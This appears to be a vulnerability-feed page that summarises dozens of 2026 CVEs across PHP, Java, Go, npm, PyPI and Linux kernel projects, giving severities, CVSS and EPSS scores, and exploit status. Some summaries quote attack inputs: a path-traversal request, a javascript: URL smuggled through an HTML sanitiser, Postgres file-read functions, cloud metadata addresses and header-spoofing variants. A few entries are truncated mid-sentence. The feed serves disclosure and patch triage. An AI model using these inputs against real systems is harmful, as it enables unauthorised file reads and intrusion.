Skip to main content

Canonical

247 CVEs vendor

Monthly

CVE-2026-45263 PHP HIGH GHSA This Week

Stored CSV formula injection in FacturaScripts (all versions through 2026.1) lets an authenticated low-privilege user plant spreadsheet formula payloads in ordinary text fields (customer/supplier/product names, contacts) that execute when an administrator opens a routine list export. Because Core/Lib/Export/CSVExport.php::writeData() wraps values without neutralising leading =,+,-,@,tab, or carriage-return characters, and Tools::noHtml() only strips HTML metacharacters, the payload reaches the CSV verbatim and Excel/LibreOffice run it (including DDE process spawning) in the admin's OS context. A live PoC was verified on 2026-04-30, so publicly available exploit code exists, though there is no active exploitation confirmed (not in CISA KEV).

PHP CSRF Microsoft Canonical RCE
NVD GitHub
CVSS 3.1
8.0
CVE-2026-45693 PHP HIGH GHSA This Week

Unauthenticated arbitrary file read in FacturaScripts (all versions through v2026.2) lets remote attackers retrieve protected documents by abusing the static file controllers Files.php and Myfiles.php, which authorize requests on the raw URL prefix rather than the resolved filesystem path. A request such as /Plugins/../MyFiles/Private/invoice.pdf passes the prefix allow-list yet resolves to a private file, leaking customer/supplier invoices, attachments, and .sql database backups. A detailed, reproducible exploit is publicly available in the GitHub Security Advisory; there is no vendor-released patch identified at time of analysis and no evidence of active exploitation.

Apache PHP Canonical Path Traversal RCE
NVD GitHub
CVSS 3.1
7.5
CVE-2026-59955 Maven HIGH PATCH GHSA This Week

{appId}/{clusterName}/{namespace} endpoint as the literal string 'raw', so no matching secret is found and the signature check is skipped for the real target app. No public exploit identified at time of analysis; the flaw is fixed in Apollo 2.5.2.

Canonical Authentication Bypass
NVD GitHub
CVSS 3.1
7.5
CVE-2026-59954 Maven HIGH PATCH GHSA This Week

Authentication bypass in Apollo (Ctrip apolloconfig) ConfigService allows an unauthenticated remote attacker to read protected configuration data from /configs and /configfiles endpoints even when AccessKey/management-key authentication is enabled. The flaw stems from ConfigService accepting a non-canonical appId variant (e.g. accented or trailing-space forms) that misses the AccessKey secret cache lookup - causing signature verification to be skipped - while the downstream release lookup still resolves the value to the real, protected app under equivalence-treating database collations. No public exploit identified at time of analysis, and it is not listed in CISA KEV; the confidentiality-only impact drives the CVSS 7.5 (High) rating.

Canonical Authentication Bypass
NVD GitHub
CVSS 3.1
7.5
CVE-2026-55372 PHP HIGH POC PATCH GHSA This Week

Server-side request forgery in NukeViet CMS before 4.6.00 lets a remote unauthenticated attacker coerce the server into issuing outbound HTTP requests to an arbitrary host by spoofing the X-Forwarded-Host and X-Forwarded-Proto headers, which flow unvalidated into the cURL URL built by server_info_update(). Because the __serverInfoUpdate=1 POST handler in includes/ini.php runs before authentication, no credentials are needed. The flaw is blind, HEAD-only and uses a fixed request path, so its practical value is internal host/port discovery and poisoning of the cached server_headers rather than data exfiltration; no public exploit beyond the advisory PoC is identified and it is not in CISA KEV.

Canonical PHP SSRF
NVD GitHub
CVSS 3.1
7.2
CVE-2026-54071 PyPI HIGH POC PATCH GHSA This Week

Arbitrary Python code execution in BabelDOC (funstory-ai, pip package `babeldoc`) prior to 0.6.3 allows an attacker to run code in the context of the translation process by having a victim process a crafted PDF. The vendored pdfminer CMap loader (`cmapdb.py::_load_data`) strips only NUL bytes from a PDF-controlled CMap/Encoding name and passes it to `pickle.loads()`, so a hex-encoded absolute path in the PDF's `/Encoding` name redirects deserialization to an attacker-planted `.pickle.gz` file. A detailed, working proof-of-concept exists (publicly available exploit code exists); there is no CISA KEV listing and no public evidence of active exploitation at time of analysis.

Deserialization Python Canonical Adobe Microsoft +4
NVD GitHub
CVSS 3.1
7.8
CVE-2026-53727 Ruby HIGH POC PATCH GHSA This Week

Server-side request forgery (and cross-scheme local file disclosure) in the Ruby css_parser gem (all versions prior to 3.0.0) lets an attacker who can land a single @import url(...) rule in parsed CSS force the server to issue arbitrary HTTP/HTTPS GETs to any internal host, port or IP, and — via an attacker-controlled 302 redirect to a file:// URI — read local files. Premailer-style consumers that re-emit the parsed CSS into rendered HTML/email leak any CSS-shaped response bytes back to the attacker, turning this into a data-exfiltration channel rather than a blind SSRF. No public CVSS is published and it is not in CISA KEV, but a complete working proof-of-concept (poc.rb) is included in the advisory, so publicly available exploit code exists.

Kubernetes Hashicorp SSRF Canonical Nginx +5
NVD GitHub
CVE-2026-49825 PyPI HIGH PATCH GHSA This Week

Stored cross-site scripting in the lxml_html_clean Cleaner (≤ 0.4.4) and the bundled lxml legacy html.clean module (≤ 6.1.0) lets attackers smuggle javascript: URLs through HTML sanitization on the namespaced xlink:href attribute. When callers configure Cleaner with safe_attrs_only=False, the URL-scheme scrubber never inspects <a xlink:href="javascript:..."> inside SVG or MathML, so the payload survives and executes when a victim clicks the rendered anchor. Publicly available exploit code exists (a working reproducer ships with the advisory), but there is no public exploit identified as being used in active attacks and the issue is not in CISA KEV.

XSS Python Canonical Mozilla
NVD GitHub
CVSS 3.1
8.2
CVE-2026-53512 npm CRITICAL PATCH GHSA Act Now

Confidential-client impersonation in better-auth below 1.6.11 lets an attacker who holds any leaked refresh_token and the public client_id mint fresh access tokens and rotated refresh tokens indefinitely. The deprecated oidcProvider() and mcp() plugins expose an OAuth 2.0 token endpoint whose refresh_token grant authenticates solely on the bound refresh-token row plus a matching client_id, never verifying the registered client_secret - a regression, since the same plugins' authorization_code grant does enforce the secret. No public exploit identified at time of analysis; the flaw was reported by @subhanUmer and fixed by the maintainers, with no CISA KEV listing or EPSS score supplied in the input.

Authentication Bypass XSS Canonical
NVD GitHub
CVSS 4.0
9.1
CVE-2026-54763 HIGH PATCH This Week

Identity/authorization header spoofing in Traefik reverse proxy (before v2.11.51, v3.6.22, and v3.7.6) lets an attacker reaching a protected route smuggle an underscore-variant HTTP header past the BasicAuth, DigestAuth, and ForwardAuth middlewares' sanitization. Traefik strips canonical dashed spoofed headers before setting its own trusted value but ignores underscore forms (e.g. X_Forwarded_User vs X-Forwarded-User) that many backends normalize identically, so the forged header reaches the backend alongside — or, on the ForwardAuth authResponseHeaders path, instead of — Traefik's intended value. There is no public exploit identified at time of analysis and the issue is not in CISA KEV, but a vendor fix and upstream commit are published.

Code Injection Canonical Traefik
NVD GitHub
CVSS 4.0
7.8
EPSS
0.3%
CVE-2026-27779 HIGH PATCH This Week

Canonical URL spoofing in Gitea before 1.25.5 lets remote attackers inject malformed X-Forwarded-Proto values that the server trusts when computing its public-facing URL, causing it to emit attacker-controlled canonical links (e.g. in emails, redirects, and generated absolute URLs). No public exploit identified at time of analysis, and the low EPSS score (0.17%, 6th percentile) reflects minimal in-the-wild interest, but a vendor patch is available in v1.25.5. Note that the published CVSS vector claims availability impact (A:H) while the description describes URL spoofing (an integrity concern), a discrepancy worth verifying with the vendor.

Authentication Bypass Canonical Gitea Gitea Open Source Git Server
NVD GitHub
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-38969 HIGH This Week

HTTP request smuggling in Ruby's WEBrick HTTP server through v1.9.2 allows remote attackers to desynchronize front-end/back-end request parsing by exploiting how WEBrick reparses a Content-Length value supplied in chunked trailers back into the canonical request state. Any deployment fronting WEBrick with a proxy, load balancer, or CDN that disagrees on message length can have requests smuggled past it, enabling request routing manipulation and information disclosure. Publicly available exploit code exists (SSVC exploitation status: poc), though EPSS remains low at 0.16% and it is not on CISA KEV.

Request Smuggling Canonical Information Disclosure
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-52829 Cargo HIGH PATCH GHSA This Week

Remote denial of service in the Zebra Zcash full-node (zebrad) up to and including v4.4.1 lets an unauthenticated peer deterministically crash any synced node running the standard Linux dual-stack configuration. By completing a P2P handshake over IPv4 to a `[::]` listener and then advertising a single invalid mempool transaction (e.g. a coinbase), the attacker triggers a reachable-assertion panic in the address book after a 30-second batch flush, and `panic = "abort"` terminates the process. No public exploit has been identified at time of analysis, but the advisory documents the full reproduction path; the crash is repeatable after every restart, enabling persistent downtime.

Canonical Denial Of Service
NVD GitHub
CVSS 3.1
7.5
CVE-2026-52736 Cargo HIGH PATCH GHSA This Week

Remote denial-of-service in Zebra (zebrad ≤ v4.4.1), the Zcash Foundation's Rust node, lets an unauthenticated P2P peer permanently stall a targeted node at a chosen block height. By exploiting ZIP-244 transaction malleability, an attacker crafts a poisoned block body sharing the same header hash as a valid canonical block; Zebra caches the hash before validation and never evicts it on failure, so the legitimate block is later rejected as a duplicate. This is a real availability threat against default configurations, though there is no public exploit identified at time of analysis and it is not listed in CISA KEV; the flaw was independently reproduced end-to-end by two researchers.

Information Disclosure Canonical Checkpoint
NVD GitHub
CVE-2026-49852 PyPI HIGH POC PATCH GHSA This Week

Authentication bypass in the joserfc Python library (PyPI, versions <= 1.6.7) lets remote attackers forge valid HS256/HS384/HS512 JWTs whenever the application's verification secret resolves to an empty string or None. Because HMACAlgorithm.verify feeds the zero-length key straight into hmac.new(b'', ...) and OctKey.import_key only warns (never rejects) empty material, an attacker with no secret knowledge recomputes the identical HMAC digest and joserfc.jwt.decode accepts arbitrary forged claims (sub, admin, scopes, exp). A full working proof-of-concept is published in the advisory, though the flaw is gated on an operator-side misconfiguration (a secret sourced from an unset env var, missing DB/Redis row, or a '' fallback) rather than a default-config defect.

Authentication Bypass Python Canonical Redis
NVD GitHub VulDB
CVE-2026-49244 Go MEDIUM PATCH NEWS GHSA This Month

Path traversal in SFTPGo's public web-client partial ZIP download endpoint allows unauthenticated remote attackers to read files located outside a browsable share's directory boundary. The flaw exists because the endpoint validated file entries using a raw string prefix check rather than a directory-boundary-aware comparison - a crafted request can escape the share root by supplying paths whose canonical form begins with the shared directory name but resolves to a parent or sibling path. Affected versions prior to v2.7.3 are vulnerable; no public exploit or CISA KEV listing has been identified at time of analysis.

Canonical Path Traversal
NVD GitHub
CVSS 3.1
5.9
CVE-2026-50180 PyPI HIGH POC PATCH GHSA This Week

Arbitrary file read in Langroid's SQLChatAgent (<= 0.63.0) lets an attacker who can influence the LLM-generated SQL exfiltrate files from the PostgreSQL host even under the strict default config (allow_dangerous_operations=False, allowed_statement_types=['SELECT']). The _validate_query blocklist enumerates dangerous functions by exact name and misses the pg_read_file/pg_stat_file/pg_ls_*/pg_current_logfile family (plus MSSQL OPENDATASOURCE and keyword-less SQLite ATTACH), so these SELECT-shaped payloads pass both the statement-type allowlist and the regex blocklist and reach the live SQLAlchemy engine. Publicly available exploit code exists (a working PoC ships in the GHSA advisory); no public exploit identified as actively exploited and this is not in CISA KEV.

PostgreSQL Python Path Traversal Canonical Docker
NVD GitHub
CVSS 4.0
8.7
EPSS
0.7%
CVE-2026-50162 Go MEDIUM PATCH GHSA This Month

Symlink traversal in oras-go's file content store allows writes outside the intended `workingDir` boundary even when `AllowPathTraversalOnWrite=false`. Applications that pull OCI artifacts from untrusted registries where an attacker controls blob titles (`ocispec.AnnotationTitle`) are at risk if any directory component under `workingDir` is a symlink pointing to an external path. No confirmed active exploitation (not in CISA KEV), but a self-contained proof-of-concept was included in the researcher's disclosure, making reproduction straightforward given the prerequisites.

Authentication Bypass Canonical
NVD GitHub
CVE-2026-50151 Go HIGH PATCH GHSA This Week

Credential leakage in oras-go v2 (oras.land/oras-go) lets a malicious or compromised OCI registry steal a client's Authorization credentials by returning a cross-host Location header during monolithic blob upload; oras-go follows the redirect and reuses the original bearer/basic credentials on the PUT to the attacker-controlled host, also yielding client-side SSRF to an arbitrary cross-host target. Any Go application that pushes artifacts using oras-go v2.6.0 (and likely earlier v2.x) is affected. Rated CVSS 7.5 (High); no CISA KEV listing and no public exploitation, but the reporter includes a local proof-of-concept reproduction harness (poc.zip), and a fixed release (v2.6.1) is available.

SSRF Canonical
NVD GitHub
CVSS 3.1
7.5
CVE-2026-49998 Go HIGH PATCH GHSA This Week

Cross-tenant JWT authentication bypass in Centrifugo (v3 through v6) lets an attacker holding a valid token for one allowed issuer/tenant authenticate as a different issuer/tenant when the server uses dynamic JWKS endpoint templates. The flaw stems from the JWKS cache and singleflight lookup being keyed only by the JWT header 'kid', so a key fetched for tenant A is reused to verify a token claiming tenant B whenever both JWKS documents share the same 'kid' and tenant A's key is cached first. Publicly available exploit code exists in the form of a reporter-supplied Go unit-test PoC; there is no evidence of active exploitation, and the CVSS base score is 8.2 (AC:H, PR:L, scope-changed).

Authentication Bypass Jwt Attack Canonical
NVD GitHub
CVSS 3.1
8.2
CVE-2026-48816 npm MEDIUM POC PATCH GHSA This Month

Timestamp forgery in sigstore-js allows an attacker supplying a crafted bundle v0.2 to manipulate certificate validity window checks by controlling the `integratedTime` field in an inclusionProof-only tlog entry. Because the inclusionProof-only code path in `@sigstore/verify` does not cryptographically bind `integratedTime` (unlike the signed inclusionPromise/set path), a low-privileged attacker who can present an untrusted bundle can cause the verifier to accept expired or not-yet-valid signing certificates as currently valid. A publicly available proof-of-concept exists; this vulnerability is not in CISA KEV.

Canonical Microsoft Information Disclosure
NVD GitHub
CVSS 3.1
6.5
EPSS
0.2%
CVE-2026-14198 CRITICAL PATCH Act Now

Authentication and authorization bypass in @fastify/middie 9.1.0 through 9.3.2 lets remote unauthenticated attackers reach protected parameterized route handlers by placing an encoded slash (%2F) in a path parameter. The middleware layer decodes %2F before matching while Fastify's router preserves the encoding, so the two disagree on the canonical path and any middie-based auth, authz, rate-limiting, or auditing middleware silently fails to run while the route handler still fires. No public exploit identified at time of analysis; the flaw is method-agnostic and requires no special preconditions, and the vendor rates it CVSS 9.1.

Authentication Bypass Canonical Fastify Middie
NVD GitHub
CVSS 3.1
9.1
EPSS
0.3%
CVE-2026-53283 MEDIUM PATCH This Month

Boot-time kernel crash in Linux 6.16+ on AMD IOMMU-equipped systems causes a General Protection Fault when a PCI device whose Bus:Device.Function address is absent from the ACPI IVRS table is encountered during IOMMU initialization. The root cause is a missing bounds check in __rlookup_amd_iommu() that was latent until commit e874c666b15b changed the rlookup_table allocation from a zeroed page-order block (which returned NULL on overrun) to a tight kvcalloc(), causing adjacent slab contents to be dereferenced as a valid struct amd_iommu pointer. The result is a non-recoverable GPF at boot time, confirmed in production on Google Compute Engine ct6e VMs; no public exploit code and no CISA KEV listing exist at time of analysis.

Google Linux Amd Canonical Denial Of Service +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.2%
CVE-2026-48753 Go CRITICAL POC PATCH GHSA Act Now

Arbitrary host file write in Incus before 7.1.0 lets a holder of S3 bucket credentials escape the storage volume via a path-traversal-laden multipart upload ID and plant files anywhere the daemon (typically root) can write, escalating to remote code execution. The flaw lives in the local S3 storage backend's multipart upload handling, where the attacker-supplied uploadId is concatenated onto the uploads directory without sanitization. A complete working PoC exists that drops a /etc/cron.d job for root command execution; no CISA KEV listing or EPSS score is provided, so this is publicly available exploit code rather than confirmed active exploitation.

Path Traversal Canonical OpenSSL
NVD GitHub
CVSS 3.1
9.9
CVE-2026-28385 MEDIUM PATCH This Month

Server-Side Request Forgery in Canonical LXD's image import endpoint allows authenticated users holding the can_create_images entitlement to direct the LXD daemon to make arbitrary outbound HTTP connections, including to loopback addresses, RFC1918 private ranges, and cloud instance metadata services such as 169.254.169.254. Affected versions span 4.12 through 6.9. An attacker can leverage error-based responses to enumerate internal TCP ports and fingerprint internal HTTP services from the daemon's privileged network position, enabling lateral reconnaissance in multi-tenant or cloud-hosted environments. No public exploit code has been identified at time of analysis, and CISA has not listed this in KEV.

SSRF Canonical Lxd
NVD GitHub VulDB
CVSS 3.1
5.0
EPSS
0.2%
CVE-2026-12411 CRITICAL PATCH Act Now

Cross-guest storage-volume hijacking in Canonical LXD 6.6 through 6.8 lets an untrusted guest instance mount, read, and overwrite the custom storage volumes owned by other guests on the same host, breaking tenant isolation. Exploitation requires the non-default security.devlxd.management.volumes option to be enabled, and is fixed in LXD 6.9. Rated CVSS 9.6 with a scope change and CISA SSVC 'total' technical impact; SSVC lists exploitation as proof-of-concept, but EPSS is very low (0.11%, 1st percentile) and it is not in CISA KEV.

Authentication Bypass Canonical Lxd
NVD GitHub VulDB
CVSS 3.1
9.6
EPSS
0.1%
CVE-2026-10512 LOW Monitor

wolfSSL's x86_64 Curve25519 scalar multiplication yields a non-canonical shared secret when carry propagation overflows into bit 255 during final modular reduction, producing a result in [p, 2^255) rather than the required canonical range [0, p). Both the x64 and AVX2 hand-written assembly paths in fe_x25519_asm.S are affected, and only specific edge-case scalar/point combinations trigger the flaw. wolfSSL self-reported this correctness defect and published a fix via GitHub PR #10536; no public exploit exists and the vulnerability is absent from CISA KEV.

Canonical Buffer Overflow Wolfssl
NVD GitHub
CVSS 4.0
2.3
EPSS
0.2%
CVE-2026-53214 MEDIUM PATCH This Month

Null pointer dereference in the Linux kernel's IPv6 address configuration subsystem crashes the kernel when cleanup_prefix_route() receives the fib6_null_entry sentinel from addrconf_get_prefix_route() and attempts to access its NULL fib6_table pointer without validation. An authenticated local user holding CAP_NET_ADMIN can trigger this by sending a crafted IPv6 DELADDR netlink message, causing a general protection fault and system-wide denial of service. No public exploit or CISA KEV listing exists; EPSS is 0.17% (6th percentile), consistent with a privilege-gated local DoS affecting an extremely widely deployed target.

Linux Canonical Denial Of Service Null Pointer Dereference
NVD VulDB
CVSS 3.1
5.5
EPSS
0.2%
CVE-2026-53184 HIGH PATCH This Week

Remote denial of service in the Linux kernel's UDP receive path affects systems where a UDP socket is placed in a BPF sockmap with an attached SK_SKB verdict program. Because skb->dev is repurposed as dev_scratch on the UDP path and never cleared before the verdict program runs, a verdict program that calls a socket-lookup helper (bpf_sk_lookup_tcp/udp, bpf_skc_lookup_tcp) causes dev_net() to dereference a stale integer as a net_device pointer, triggering a general protection fault on a non-canonical address in softirq. There is no public exploit identified at time of analysis, EPSS is low (0.18%, 8th percentile), and the flaw is fixed; impact is availability only (kernel crash), not the 'Information Disclosure' the input tags suggest.

Linux Canonical Information Disclosure
NVD VulDB
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-52953 HIGH PATCH This Week

Local denial of service in the Linux kernel's Intel VT-d (iommu/vt-d) driver lets a privileged user crash the host by terminating a QEMU/VFIO guest, triggering a general-protection-fault oops. The flaw lives in domain_remove_dev_pasid(), which dereferences the global static blocked domain - a dummy iommu_domain with no backing dmar_domain - during PASID teardown on device reset. No public exploit is identified at time of analysis; EPSS is low (0.17%, 7th percentile) and it is not in CISA KEV.

Linux Canonical Information Disclosure Buffer Overflow
NVD VulDB
CVSS 3.1
7.1
EPSS
0.2%
CVE-2026-52941 MEDIUM PATCH This Month

NULL pointer dereference in the Linux kernel SMC subsystem's smc_msg_event tracepoint crashes the kernel when SMC-D socket traffic is processed while the tracepoint is active. Affected kernels from commit aff3083f10bff7a37eaa2b4e6bc5fb627ddd5f84 across multiple stable branches dereference conn->lnk unconditionally in the tracepoint, though this pointer is only valid for SMC-R connections and is NULL for SMC-D. While activating the tracepoint requires root, the crash itself can be triggered by any unprivileged user via AF_SMC socket operations on SMC-D capable systems (s390 natively, or x86 with loopback ISM loaded). No public exploit or active exploitation confirmed; EPSS sits at 0.16%.

Linux Canonical Denial Of Service Null Pointer Dereference
NVD VulDB
CVSS 3.1
5.5
EPSS
0.2%
CVE-2026-52938 MEDIUM PATCH This Month

NULL pointer dereference in the Linux kernel's BPF socket storage subsystem (net/core/bpf_sk_storage.c) allows a local low-privileged user to crash the kernel. The race condition between bpf_selem_unlink_nofail() - which nulls smap before removing the element from the hlist - and concurrent RCU readers in bpf_sk_storage_clone() and bpf_sk_storage_diag_put_all() can be triggered during TCP SYN handling (socket cloning path), producing a kernel panic. No public exploit identified at time of analysis; EPSS of 0.14% (4th percentile) confirms negligible observed exploitation probability.

Linux Canonical Denial Of Service Null Pointer Dereference
NVD VulDB
CVSS 3.1
5.5
EPSS
0.1%
CVE-2026-54512 Maven HIGH POC PATCH GHSA This Week

PolymorphicTypeValidator bypass in jackson-databind versions 2.10.0 through 2.18.7, 2.19.0 through 2.21.3, and 3.0.0 through 3.1.3 allows attackers controlling JSON type identifiers to smuggle denied gadget classes through allow-listed generic containers, leading to arbitrary class instantiation and potential remote code execution. The flaw stems from DatabindContext._resolveAndValidateGeneric() validating only the raw container class name while skipping all nested generic type arguments. No public exploit identified at time of analysis, but the GHSA advisory includes a proof-of-concept configuration and payload structure.

Canonical Deserialization Jackson Databind Suse
NVD GitHub HeroDevs VulDB
CVSS 3.1
8.1
EPSS
0.6%
CVE-2026-55488 PyPI HIGH PATCH GHSA This Week

Arbitrary file read in motionEye versions before 0.44.0 lets remote attackers retrieve any file readable by the motionEye process by supplying an absolute path to the media playback, download, and preview handlers. The flaw stems from os.path.join() discarding the configured media directory when given an absolute path, compounded by MoviePlaybackHandler deliberately overriding Tornado's StaticFileHandler path-safety checks. A proof-of-concept exists and the CVSS 4.0 exploit-maturity is rated Proof-of-Concept, but there is no public evidence of active exploitation.

Canonical Python Path Traversal
NVD GitHub
CVSS 4.0
7.7
EPSS
0.6%
CVE-2026-54350 npm CRITICAL PATCH GHSA Act Now

{$exists:true}`) that override the builder's intended filter, returning or altering every document in a MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or JSON-body REST collection. A detailed working POC is published in the advisory; the issue is not in CISA KEV and EPSS is low (0.43%, 34th percentile), so this is publicly demonstrated but not yet confirmed as actively exploited.

SQLi Canonical Docker PostgreSQL Elastic +2
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.4%
CVE-2026-50137 npm HIGH PATCH GHSA This Week

Unauthenticated S3 pre-signed URL minting in Budibase (npm @budibase/server before 3.39.0) lets anonymous attackers abuse the route POST /api/attachments/:datasourceId/url, which was registered with only a recaptcha middleware and no authorized() gate. An attacker who knows or enumerates a workspace id (app_...) and an S3 datasource id (ds_...) receives a 15-minute AWS SigV4 pre-signed PutObjectCommand URL minted on the victim's stored IAM credentials, and because the bucket is caller-controlled they can write to any bucket those credentials permit. Publicly available exploit code exists (a self-contained Node.js PoC is published in the advisory); this is not listed in CISA KEV and no EPSS score was provided.

Canonical Authentication Bypass Node.js
NVD GitHub VulDB
CVSS 4.0
8.2
EPSS
0.3%
CVE-2026-12249 CRITICAL PATCH Act Now

TLS trust store poisoning in Canonical ADSys through v0.16.2 allows a network-positioned attacker to inject an arbitrary Root CA certificate into managed Ubuntu hosts during Active Directory Certificate Services auto-enrollment. The vendored Samba GPO extension fetches the CA certificate over plaintext HTTP from the AD CS GetCACert endpoint, and the response is registered into the system trust store via update-ca-certificates without authenticity validation. No public exploit identified at time of analysis, but the impact enables persistent decryption of TLS traffic across the host.

Ubuntu Canonical Python Information Disclosure Ubuntu 20 04 Lts +4
NVD GitHub
CVSS 4.0
9.0
EPSS
0.1%
CVE-2026-55187 Go MEDIUM PATCH GHSA This Month

Incomplete SSRF remediation in mailpit v1.29.2 through v1.30.1 leaves the Link Check API bypassable via IPv6 transition mechanism literals (6to4, NAT64, IPv4-compatible IPv6, ISATAP, Teredo) and unclassified IPv6 prefixes (fec0::/10, 2001:db8::/32) that Go's stdlib Is* classification helpers silently pass. An unauthenticated network attacker who can deliver email to mailpit's SMTP listener and invoke the Link Check API can coerce the application into dialing internal IPv4 destinations - including cloud metadata endpoints at 169.254.169.254 - by encoding the target as an IPv6 literal that returns false for all seven predicates in IsInternalIP, bypassing the guard introduced for CVE-2026-27808. Publicly available exploit code exists in the form of a reproducible unit test and end-to-end proof-of-concept published in the advisory; this is the same deny-list bypass class confirmed in CVE-2026-44430 (MCP Registry) and CVE-2026-45741 (Gotenberg).

Gitlab Python Microsoft Canonical SSRF
NVD GitHub
CVSS 3.1
5.8
EPSS
0.3%
CVE-2026-10720 Go MEDIUM PATCH This Month

Path traversal in MicroCeph's remote-import API allows enrolled cluster members or join token holders to manipulate files within the `/var/snap/microceph` snap confinement boundary, enabling daemon disruption and cluster state pollution across the squid and tentacle release tracks. The root cause is missing input validation on `name` and `LocalName` parameters in `cmdRemotePut`, permitting `..` sequences to reach unintended directories. No public exploit has been identified at time of analysis; an upstream fix exists as GitHub PR #758 with no confirmed tagged snap release.

Path Traversal Canonical Microceph
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.2%
CVE-2026-54319 Go MEDIUM PATCH GHSA This Month

Path traversal in Daytona's sandbox volume mount handling (versions <= 0.185.0) allowed a crafted volume reference containing traversal sequences to theoretically resolve the runner's bind-mount source path outside the intended per-volume base directory, with a worst-case impact of cross-tenant read/write access to other tenants' FUSE-mounted volume data. Critically, the vendor confirmed the vulnerability was NOT exploitable in any released version: volume references pass through UUID-type database validation before reaching the runner, structurally rejecting traversal payloads and producing a server-side validation error instead of an unintended mount. No public exploit has been identified and the CVE carries no CISA KEV listing, consistent with a latent code-path defect rather than an active attack surface.

Canonical Information Disclosure
NVD GitHub VulDB
CVSS 3.1
4.2
EPSS
0.2%
CVE-2026-24791 Go HIGH PATCH GHSA This Week

Authorization bypass in Gitea versions 1.22.3 through 1.26.1 allows holders of `public-only` access tokens or OAuth grants to read and modify private account resources via `/api/v1/user/...` self routes, despite the public-only flag being designed to restrict tokens to public data. The flaw is a systemic scope-boundary failure across many self routes (SSH keys, emails, OAuth apps, Actions secrets/variables/runners, private repos, webhooks), publicly available exploit code exists in the form of reproducible Go PoCs in the advisory, and the issue represents an incomplete fix of CVE-2025-68941 in a different route family.

Gitea Canonical Authentication Bypass
NVD GitHub
CVSS 3.1
8.1
CVE-2026-9678 npm MEDIUM PATCH GHSA This Month

Cache information disclosure in Undici's shared-mode cache interceptor allows a prior authenticated user's HTTP response to be served to a subsequent, potentially unauthenticated, caller. Applications using Undici's explicit `interceptors.cache()` in shared mode that forward Authorization headers to an upstream which returns Cache-Control headers with whitespace-padded qualified directives (e.g., `private=" authorization"`) are affected across all v7 versions prior to 7.28.0 and all v8 versions prior to 8.5.0. No public exploit has been identified at time of analysis; exploitation is bounded by high attack complexity (CVSS AC:H, score 5.9), but when conditions align, the confidentiality impact is complete.

Canonical Information Disclosure Undici Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
5.9
EPSS
0.2%
CVE-2026-54300 npm MEDIUM PATCH GHSA This Month

Regex translation in the @astrojs/netlify adapter broadens Astro's image.remotePatterns beyond the intended allowlist when building for Netlify deployment, enabling unauthorized image fetches from apex hosts and deeper URL paths. Versions of @astrojs/netlify prior to 7.0.13 (confirmed vulnerable at 7.0.10) generate Netlify Image CDN regex patterns that make wildcard subdomains optional and omit end-anchoring on pathname segments, causing the Netlify CDN to accept URLs that Astro's canonical matcher would reject. Unauthenticated public requesters can exploit this to cause the Netlify Image CDN to fetch image-like resources from hosts or paths outside the developer's intended scope, constituting a partial SSRF bypass against the image proxy allowlist. No active exploitation has been confirmed in CISA KEV, but a detailed reproduction is included in the GHSA advisory.

Canonical Node.js SSRF
NVD GitHub
CVSS 3.1
5.3
EPSS
0.2%
CVE-2026-48747 PHP MEDIUM PATCH GHSA This Month

Algorithm-confusion in Symfony's Mailomat webhook parser allows an attacker to downgrade the HMAC primitive used for signature verification, bypassing webhook authentication. Symfony packages symfony/mailomat-mailer and symfony/symfony versions 7.2.0 through 7.4.12 and 8.0.0 through 8.0.12 accept an attacker-controlled algorithm field from the inbound X-MOM-Webhook-Signature request header and pass it directly to PHP's hash_hmac(), enabling an adversary who can exploit cryptographic weaknesses in weaker HMAC primitives (e.g., HMAC-MD4 existential forgery) to inject fraudulent webhook payloads. No public exploit has been identified at time of analysis, and this CVE is not listed in CISA KEV.

Canonical Jwt Attack PHP Information Disclosure
NVD GitHub
CVSS 4.0
6.3
EPSS
0.2%
CVE-2026-54093 Go MEDIUM PATCH GHSA This Month

Zip-slip path traversal in filebrowser v2.63.5 and earlier (Linux-hosted) allows any authenticated user with Create permission to plant a file whose name contains URL-encoded Windows-style backslash traversal sequences (`%5C`). The Linux server stores the file with a literal backslash in its name, which `filepath.ToSlash()` silently ignores, and the archive download handler emits that name verbatim into zip/tar central directories. When a Windows victim downloads and extracts the archive using Explorer, 7-Zip, WinRAR, or .NET `ZipFile.ExtractToDirectory`, the extractor interprets `\` as a path separator and writes files to arbitrary locations outside the extraction directory - enabling arbitrary file write on the victim's Windows machine. No public exploit identified at time of analysis beyond the full PoC published in the GHSA advisory; EPSS is 0.03% (8th percentile), consistent with the two-party, victim-interaction requirement.

Path Traversal Canonical Microsoft Docker
NVD GitHub
CVSS 4.0
6.8
EPSS
0.0%
CVE-2026-53809 npm MEDIUM PATCH GHSA This Month

OpenClaw's embedded runner policy incorrectly resolves provider aliases against other aliases rather than their canonical provider identities, enabling an authenticated local user to bypass intended provider policy restrictions. When the affected provider alias feature is active, a low-privileged attacker can select bundled tool access that falls outside the scope their policy should permit, effectively sidestepping the authorization boundary. No public exploit has been identified and no active exploitation is confirmed via CISA KEV; the local attack vector and required feature enablement materially limit real-world exposure.

Canonical Authentication Bypass Openclaw
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-48045 PyPI MEDIUM PATCH GHSA This Month

Memory exhaustion and CPU starvation in python-zeroconf before 0.149.12 allows any unauthenticated LAN-adjacent host to OOM-kill or stall the zeroconf process by flooding TC-flagged mDNS queries over UDP/5353. The `AsyncListener.handle_query_or_defer` method retained all TC-bit packets in an unbounded `_deferred[addr]` dictionary - each entry up to 8,966 bytes of raw buffer plus parsed DNS state - with no cap on per-address queue depth or total distinct source addresses, and the per-arrival dedup scan ran O(N) causing quadratic CPU growth as queues expanded. Trivially spoofed source IPs multiply the memory footprint across `_deferred`/`_timers`; on Raspberry Pi-class hardware running Home Assistant, sustained flood traffic causes OOM termination; no public exploit identified at time of analysis.

Python Canonical Denial Of Service Suse
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-47731 PyPI CRITICAL PATCH GHSA Act Now

